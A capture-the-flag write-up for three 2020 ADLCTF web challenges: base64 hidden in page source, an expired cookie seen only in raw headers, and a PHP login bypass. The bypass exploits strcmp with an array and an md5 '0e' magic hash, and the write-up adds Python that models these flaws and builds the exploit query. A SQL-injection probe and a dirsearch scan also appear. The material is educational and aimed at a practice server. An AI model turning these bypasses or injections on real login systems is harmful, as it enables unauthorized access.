# 2020 ADLCTF web write up

###### tags: `CTF` `write-up`

## Hello pika!

- `ctrl+u` to view the page source

```htmlembedded=
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>pika pika</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/rainbow.css" rel="stylesheet">
    <!-- T3BwcyB5b3UgZm91bmQgbWUuIE5pY2UgdHJ5IQo= -->
</head>
<body>
    <div class="text-center d-flex justify-content-center flex-column" style="height: 100vh">
        <h1><img src="./pika.jpg" width="600" alt="QURMQ1RGe3AxazRfdzB3X3VfQzROX3IzYURfd2U2X1NSYyF9Cg=="></img></h1>
        <p style="font-size: 3em;">
            Say hello to pikachu.<br>
            Pika Pika.
        </p>
        <span style="visibility:hidden">bmljZSB0cnkhCg==</span>
    </div>
    <script src="js/jquery-slim.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
</body>
</html>
```

- The `alt=...` attribute on line 14 (the `<img>` tag) is base64; decoding it gives the flag. The base64 in the HTML comment on line 10 and in the hidden `<span>` are decoys (they decode to `Opps you found me. Nice try!` and `nice try!`)

## Hello pika (2)

- Look at the cookies
- There is a cookie `flags=QWxtb3N0IHRoZXJlISBUcnkgd2l0aCBjdXJsfg==`

![](https://i.imgur.com/85J0mlh.png)

- base64 decoding it gives `Almost there! Try with curl~`
- `curl -I http://ctf.adl.tw:12001`
    - `-I`: send a HEAD request and show only the response headers

![](https://i.imgur.com/PAHlTZs.png)

- The response sets another cookie, `_flags=QURMQ1RGe3Bpa2FfdV9mMHVuZF80bl9lWHAxMkVEX2MwMGsxMyF9`, but it is already expired, and **the browser automatically removes expired cookies**: a `Set-Cookie` whose expiry is already in the past is treated as a delete, so the cookie is never stored and never shows up in the DevTools cookie panel
- It is still right there in the raw `Set-Cookie` response header, so either the response headers under `F12 -> Network` or a plain `curl` of the headers will show it
- base64 decode it and that is the flag

## Pika Pika

- Source code

```htmlembedded=
<!DOCTYPE html>
<html>
<head>
    <!-- Don't waste time using dirsearch, pika.
    -->
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>pika pika</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/rainbow.css" rel="stylesheet">
</head>
<body>
    <div class="text-center d-flex justify-content-center flex-column" style="height: 100vh">
        <h1><img src="./img/pika_index.png" width="600"></img></h1>
        <p style="font-size: 3em;">
            Pika Pika.
        </p>
        <!-- There are no secret files, pika. -->
    </div>
    <script src="js/jquery-slim.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
</body>
</html>
```

- Line 4 tells me not to bother with dirsearch, so naturally I did XD
- Ran [dirsearch](https://github.com/maurosoria/dirsearch) with `python3 dirsearch.py -e php,txt,html -u http://ctf.adl.tw:12002/`
- It turned up a few interesting things

![](https://i.imgur.com/nom2ooD.png =300x)

- Visiting `.../login.php` first: it redirects to `.../secret.php`, which has a login form
- Tried `username=' or 1=1 --` with `password=123` and just got `ERR_CONNECTION_RESET`
- On to the other files: `.../robots.txt`, which lists the paths the site does not want crawlers to index, so it is worth reading for exactly that reason

![](https://i.imgur.com/N42Dn2b.png =200x)

- So poke at `.../login.php.bak`, and the server hands over a file download, `login.php.bak`

```php=
<?php
$flag = "ADLCTF{????????}"; // TODO
$user = $_GET['user'];
$pass = $_GET['pass'];
if (!isset($user) || !isset($pass)) {
    header("Location: /secret.php"); // without the user & pass GET parameters you get redirected to secret.php
} else {
    if (md5($pass) == "0e481756596645574257920728035178" // PHP loose comparison
        && !strcmp($user, $flag)) { // strcmp can be tricked too
        $text = $flag;
    } else {
        $text = "PIKA PIKA.";
    }
}
?>
```

- To pass, we need `md5($pass) == "0e..."` to be true and `strcmp($user, $flag)` to be falsy
    1. `strcmp` returns 0 when its two arguments are equal, but when it cannot compare them (for example, when one argument is an array) it emits a warning and returns NULL instead, and `!NULL` is `true` just like `!0`
        - So make the comparison fail: pass `$user` as an array (`user[]` in the query string)
        - This only works on PHP 5/7; PHP 8 throws a `TypeError` when `strcmp()` receives an array
    2. md5 is a one-way hash, so recovering a preimage of `0e481...` is not an option. `==` is PHP's loose comparison, which does not require both operands to have the same type
        - e.g. `0e123` is a string, but it is also a number in scientific notation, $0 \times 10^{123} = 0$
        - so `0e48...` is read as $0 \times 10^{48\ldots} = 0$
        - which means any string whose md5 hex digest is also `0e` followed only by digits passes the check: both sides are numeric strings, PHP compares them as numbers, and both are 0
        - e.g. `md5(QNKCDZO) = 0e830400451993494058024219903391`
- So `.../login.php?user[]&pass=QNKCDZO` returns the flag
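For the Hello pika! challenge above, decoding one `alt` attribute by hand is enough, but the same page hides base64 in three different places (a comment, an attribute, a hidden text node), and only one of them is the flag. The following is an added example, not code from the write-up: a small scanner that walks the HTML once, tries every base64-looking token in comments, attribute values and text, and reports the decoded ones. The page source is the one quoted above, embedded as constructed input; the minimum token length and the flag format `ADLCTF{...}` are assumptions for filtering.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Constructed input: the "Hello pika!" page source quoted in the write-up.
HELLO_PIKA_HTML = """<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>pika pika</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/rainbow.css" rel="stylesheet">
    <!-- T3BwcyB5b3UgZm91bmQgbWUuIE5pY2UgdHJ5IQo= -->
</head>
<body>
    <div class="text-center d-flex justify-content-center flex-column" style="height: 100vh">
        <h1><img src="./pika.jpg" width="600" alt="QURMQ1RGe3AxazRfdzB3X3VfQzROX3IzYURfd2U2X1NSYyF9Cg=="></img></h1>
        <p style="font-size: 3em;">
            Say hello to pikachu.<br>
            Pika Pika.
        </p>
        <span style="visibility:hidden">bmljZSB0cnkhCg==</span>
    </div>
    <script src="js/jquery-slim.min.js"></script>
</body>
</html>
"""

# A base64 candidate: base64 alphabet only, at least 8 chars (assumed cut-off to limit
# false positives), length a multiple of 4.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
FLAG_RE = re.compile(r"ADLCTF\{[^}]*\}")


def decode_if_base64(token):
    """Return the decoded text if `token` is valid base64 for printable UTF-8, else None."""
    if len(token) % 4 or not B64_TOKEN.match(token):
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Allow a trailing newline (echo-style payloads) but nothing else unprintable.
    return text if text.rstrip("\r\n").isprintable() else None


class HiddenBase64Scanner(HTMLParser):
    """Collects base64-looking tokens from the three places this page hides them:
    HTML comments, tag attributes and (possibly hidden) text nodes."""

    def __init__(self):
        super().__init__()
        self.hits = []  # (location, token, decoded text), in document order

    def _scan(self, location, text):
        for token in text.split():
            decoded = decode_if_base64(token)
            if decoded is not None:
                self.hits.append((location, token, decoded))

    def handle_comment(self, data):
        self._scan("comment", data)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value:
                self._scan(f"<{tag} {name}>", value)

    def handle_data(self, data):
        self._scan("text", data)


def scan_page(html):
    scanner = HiddenBase64Scanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits


def find_flags(html):
    """Decoded tokens that contain an ADLCTF{...} flag."""
    return [m.group(0) for _, _, decoded in scan_page(html) for m in FLAG_RE.finditer(decoded)]


if __name__ == "__main__":
    for location, token, decoded in scan_page(HELLO_PIKA_HTML):
        print(f"{location:12} {token} -> {decoded.rstrip()}")
    print("flags:", find_flags(HELLO_PIKA_HTML))
```

Tokens such as `stylesheet` or `viewport` are base64-shaped but are rejected by the length rule or because they do not decode to UTF-8, which is what keeps the output down to the three planted strings.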
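The point of Hello pika (2) is that the browser and `curl -I` see different things: the wire carries two `Set-Cookie` headers, but a cookie whose `Expires` is already in the past is a deletion, so no cookie store keeps it. This added example (not part of the write-up) reproduces that with Python's standard library: it parses a raw response, lists every `Set-Cookie` as sent, and then feeds the same headers to an `http.cookiejar.CookieJar`, which drops the expired one exactly as the browser did. The raw response is constructed; the two cookie values are from the write-up, the other headers and the `Expires` date are assumptions.

```python
import base64
import http.client
import http.cookiejar
import io
import urllib.request
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed raw response modelled on what `curl -I` showed for the challenge:
# the two cookie values come from the write-up, everything else is assumed.
RAW_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Set-Cookie: flags=QWxtb3N0IHRoZXJlISBUcnkgd2l0aCBjdXJsfg==; Path=/\r\n"
    b"Set-Cookie: _flags=QURMQ1RGe3Bpa2FfdV9mMHVuZF80bl9lWHAxMkVEX2MwMGsxMyF9; "
    b"Expires=Thu, 01 Jan 1970 00:00:00 GMT; Path=/\r\n"
    b"\r\n"
)
URL = "http://ctf.adl.tw:12001/"


def parse_response(raw):
    """Split a raw HTTP/1.1 response into its status line and parsed headers."""
    fp = io.BytesIO(raw)
    status_line = fp.readline().decode("ascii").rstrip("\r\n")
    headers = http.client.parse_headers(fp)  # reads up to the blank line
    return status_line, headers


def raw_set_cookies(raw, now=None):
    """Every Set-Cookie header exactly as the server sent it, expired or not.
    This is the `curl -I` / DevTools Network view."""
    now = now or datetime.now(timezone.utc)
    _, headers = parse_response(raw)
    cookies = []
    for header in headers.get_all("Set-Cookie", []):
        pair, *attr_parts = [p.strip() for p in header.split(";")]
        name, _, value = pair.partition("=")
        attrs = {k.strip().lower(): v.strip() for k, _, v in (p.partition("=") for p in attr_parts)}
        expired = "expires" in attrs and parsedate_to_datetime(attrs["expires"]) <= now
        cookies.append({"name": name, "value": value, "expired": expired, "attrs": attrs})
    return cookies


def stored_cookies(raw, url=URL):
    """What a cookie jar keeps after processing the same response. A Set-Cookie whose
    Expires is already in the past is an instruction to delete, so it is never stored;
    browsers do the same, which is why `_flags` never appears in the cookie panel."""
    _, headers = parse_response(raw)

    class _Response:  # http.cookiejar only needs .info() returning the headers
        def info(self):
            return headers

    jar = http.cookiejar.CookieJar()
    jar.extract_cookies(_Response(), urllib.request.Request(url))
    return {c.name: c.value for c in jar}


def decode_cookie(value):
    return base64.b64decode(value).decode("utf-8")


if __name__ == "__main__":
    print("on the wire:")
    for c in raw_set_cookies(RAW_RESPONSE):
        print(f"  {c['name']:7} expired={c['expired']!s:5} -> {decode_cookie(c['value'])}")
    print("kept by a cookie jar:", stored_cookies(RAW_RESPONSE))
```

The lesson for recon generalises: anything a server sends in a header that the client is told to discard (expired cookies, cleared cookies, `Clear-Site-Data`) is invisible in the browser's stored state, so check the raw response rather than the cookie viewer.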
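The two bypasses in Pika Pika (`strcmp` on an array, and a `0e...` md5 "magic hash" under `==`) are easy to state but worth checking rather than trusting. This added example, which is mine and not the challenge author's code, models the relevant PHP rules in Python: PHP's numeric-string comparison for `==`, `strcmp()` returning NULL on an array (PHP 5/7), how `user[]` turns into an array in `$_GET`, and a filter that finds magic-hash strings in a word list. The models are deliberate simplifications (PHP's whitespace handling for numeric strings and the full `$_GET` grammar are not reproduced), and the flag placeholder is the redacted value from `login.php.bak`.

```python
import hashlib
import re
from urllib.parse import parse_qsl, urlencode

TARGET_HASH = "0e481756596645574257920728035178"  # hard-coded in login.php.bak
FLAG_PLACEHOLDER = "ADLCTF{????????}"             # the .bak has the real flag redacted

# PHP's numeric-string grammar (optional sign, digits, optional fraction, optional exponent),
# with the leading/trailing whitespace rules simplified. An md5 hex digest can only match
# it when it is all digits or of the form 0e<digits>.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?\s*$")


def php_loose_str_eq(a, b):
    """Model of `$a == $b` for two PHP strings: two numeric strings are compared as numbers
    (as floats when an exponent is present); anything else is compared byte by byte.
    PHP 7 and 8 agree on this case; PHP 8 only changed number-vs-non-numeric-string."""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        # A zero mantissa is 0.0 whatever the exponent, so "0e<30 digits>" is 0.0
        # both in CPython's strtod and in PHP's.
        return float(a) == float(b)
    return a == b


def php_strcmp(a, b):
    """strcmp() as PHP 5/7 behave: <0 / 0 / >0 for two strings, but a warning plus NULL
    (None here) when either argument is an array. PHP 8 throws a TypeError instead,
    which is the caveat for the user[] trick."""
    if isinstance(a, (list, dict)) or isinstance(b, (list, dict)):
        return None
    return (a > b) - (a < b)


def is_magic_md5(s):
    """True when md5(s) is a 'magic hash': 0e followed by 30 digits, i.e. 0.0 under PHP's ==."""
    return re.fullmatch(r"0e\d{30}", hashlib.md5(s.encode()).hexdigest()) is not None


def find_magic(candidates):
    return [c for c in candidates if is_magic_md5(c)]


def php_get(query):
    """How PHP builds $_GET from a query string, for the subset used here:
    `name[]` keys become arrays (lists), everything else stays a string."""
    get = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.endswith("[]"):
            get.setdefault(key[:-2], []).append(value)
        else:
            get[key] = value
    return get


def login_check(query):
    """The condition from login.php.bak evaluated on a query string using the models above.
    Returns None where the real page would redirect (missing parameter)."""
    get = php_get(query)
    user, password = get.get("user"), get.get("pass")
    if user is None or password is None:
        return None
    # md5() of an array is NULL in PHP 5/7, which never == the target string.
    md5_ok = isinstance(password, str) and php_loose_str_eq(
        hashlib.md5(password.encode()).hexdigest(), TARGET_HASH)
    # Python's `not` on None / 0 / nonzero int matches PHP's `!` on NULL / 0 / int.
    return md5_ok and not php_strcmp(user, FLAG_PLACEHOLDER)


def exploit_query(password="QNKCDZO"):
    """urlencode emits user%5B%5D=, which PHP decodes to user[] and stores as an array."""
    return urlencode({"user[]": "", "pass": password})


if __name__ == "__main__":
    print("magic candidates:", find_magic(["admin", "QNKCDZO", "240610708"]))
    print("query:", exploit_query(), "->", login_check(exploit_query()))
    print("honest login:", login_check("user=admin&pass=hunter2"))
```

Note that `php_loose_str_eq("1e3", "1000")` is also true; the `0e` digests are just the instance of numeric-string comparison that a hex digest can produce.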